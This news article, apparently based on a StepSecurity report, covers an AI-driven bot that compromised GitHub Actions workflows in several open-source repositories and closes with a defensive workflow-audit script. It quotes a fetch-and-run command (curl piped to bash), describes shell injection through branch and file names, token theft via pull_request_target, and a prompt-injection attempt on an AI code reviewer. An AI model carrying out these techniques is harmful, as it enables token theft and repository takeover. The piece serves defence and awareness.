The Rise of the Autonomous Adversary: How “Hackerbot-Claw” Hijacked Major Open-Source Repositories
According to a StepSecurity report, over the past week, an unidentified bot with the telling name “hackerbot-claw” launched a relentless hunt against prominent open-source projects, clearly highlighting the lingering vulnerabilities within build infrastructures. This automated program systematically searched for weak points in GitHub Actions workflows, achieving remote code execution in several instances, and in certain cases, taking complete control of the repository.
These attacks persisted from February 21 to February 28, 2026. The “hackerbot-claw” account, created on February 20, declared itself an “autonomous security research agent” powered by a language model, and even listed cryptocurrency wallets for donations. Within a single week, the bot opened over ten pull requests, deliberately testing the build scripts in repositories connected to Microsoft, Datadog, the Cloud Native Computing Foundation, alongside major independent projects.
The general strategy remained consistent. The bot would create a branch or a pull request, trigger the automated validation process, and quietly slip in a malicious command similar to curl -sSfL hackmoltrepeat.com/molt | bash. From there, the build script itself would execute the attacker’s code inside the continuous integration environment. In five out of seven cases, the attacks were entirely or partially successful.
The most damaging episode unfolded within the avelino/awesome-go repository, one of the most popular lists of Go projects. The bot exploited a common configuration error, where the pull_request_target event gives the workflow access to the main repository’s secrets, while the system still loads code from an external branch. The malicious code was added to the init() function of a utility Go script used for quality checks. During the build, this function ran automatically and sent a GITHUB_TOKEN with write permissions to an external server. Logs confirmed that the check was successful, though the step took noticeably longer than usual. The stolen token then allowed the attacker to modify code and merge pull requests.
The project-akri/akri initiative suffered a similar fate. There, the attacker simply added a harmful line to the version.sh script and left a comment that triggered an automated version update. Without verifying the author, the script executed code from an external branch and ran the embedded command.
In the microsoft/ai-discovery-agent repository, the attack was even more inventive. The payload was hidden directly in the branch name. When the script wrote the branch name to a file using the shell, the interpreter executed command substitution. The build log showed a two-minute gap, which is a classic sign of an external script being downloaded and run.
Targeting datadog/datadog-iac-scanner, the bot encoded the command within a file name using base64. The script passed the file name into a shell loop without escaping it, which again led to the command being executed. The Datadog team closed the vulnerability about nine hours later by adding author permission checks and tightening the launch parameters.
The most high-profile incident was the breach of Aqua Security and the Trivy project. The bot used the same pull_request_target mechanism to inject code into the Go setup action and steal a personal access token. Nineteen minutes after the script started, the stolen token was used to push changes directly to the main repository. The attacker made the project private, renamed it, deleted releases from version 0.27.0 to 0.69.1, and uploaded a suspicious file to the Trivy extension for Visual Studio Code. The Aqua Security team later restored the repository and released version 0.69.2, but the star count was reset to zero because the project had to be recreated.
In the ambient-code/platform project, the bot tried to capitalize on a modern trend by attacking an automated code review system powered by the Claude model, rather than a human. Instructions were added to a configuration file to force the model to make outside changes and approve the request. The model recognized the prompt injection and refused to follow the instructions, explicitly pointing out the attempted manipulation. Here, the defense worked successfully.
Finally, the last target was RustPython/RustPython. Once again, a base64-encoded command was hidden in the branch name. The auto-formatting script ran with elevated privileges and inserted the branch name into a git push command. In one run, the substitution worked partially, but a decoding error prevented the command from reaching the script-download stage.
In total, the bot used five different techniques: injecting code into scripts, manipulating branch names, substituting file names, exploiting pull_request_target, and attempting to poison instructions for an artificial intelligence model. Five of the seven targets were compromised to some extent. In the case of Trivy, the attack led to a complete takeover of the repository and the deletion of its releases.
This story proves that automated bots are already scanning open-source projects around the clock, without breaks or weekends. A flawed build script configuration becomes a direct path to secrets and tokens with write access. Developers must carefully reconsider how they use pull_request_target, limit the permissions of the GITHUB_TOKEN, and closely check what data enters shell commands without being properly escaped.
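The three checks recommended above can be turned into a small audit script. The sketch below is an added example, not code from StepSecurity or any project named in the article. It scans workflow text for a pull_request_target job that checks out the pull request's head, for attacker-controlled contexts such as the branch name expanded directly inside a run: script, and for a missing permissions: block. The names audit_workflow and SAMPLE are hypothetical, the sample workflow is constructed, and the script uses line-based regular expressions rather than a full YAML parser.

```python
import re

# Expression contexts whose value a pull-request author controls.
UNTRUSTED = re.compile(
    r"\$\{\{[^}]*\bgithub\.(?:head_ref|event\.(?:pull_request\.(?:head\.ref|title|body)"
    r"|comment\.body|issue\.(?:title|body)))[^}]*\}\}")
PR_HEAD_REF = re.compile(r"^\s*ref:.*github\.(?:head_ref|event\.pull_request\.head\.(?:sha|ref))")
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")

def audit_workflow(text):
    """Return (line_no, finding) pairs for one workflow file; line 0 means whole file."""
    findings = []
    privileged = re.search(r"^[^#\n]*\bpull_request_target\b", text, re.M) is not None
    if not re.search(r"^\s*permissions:", text, re.M):
        findings.append((0, "no permissions: block restricting GITHUB_TOKEN"))
    run_col = None  # column of the run: key while inside its block scalar
    for no, line in enumerate(text.splitlines(), 1):
        indent = len(line) - len(line.lstrip())
        if run_col is not None and line.strip() and indent <= run_col:
            run_col = None  # dedent: the script block has ended
        m = RUN_KEY.match(line) if run_col is None else None
        script = m.group(2) if m else (line if run_col is not None else "")
        if m and script[:1] in ("|", ">"):
            run_col, script = len(m.group(1)), ""  # multi-line script starts below
        if UNTRUSTED.search(script):
            findings.append((no, "untrusted context expanded inside run: script"))
        if privileged and PR_HEAD_REF.match(line):
            findings.append((no, "pull_request_target job checks out PR head code"))
    return findings

# Constructed sample workflow, not taken from any repository named in the article.
SAMPLE = """\
on:
  pull_request_target:
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: |
          echo "${{ github.head_ref }}" > branch.txt
      - env:
          BRANCH: ${{ github.head_ref }}
        run: echo "$BRANCH" > branch.txt
"""
if __name__ == "__main__":
    print(*audit_workflow(SAMPLE), sep="\n")
```

The last step in the sample is the corrected form: the branch name reaches the shell through an environment variable and a quoted expansion, so it is not flagged. The script does not trace values that reach the shell by other routes, such as the file names in the Datadog case.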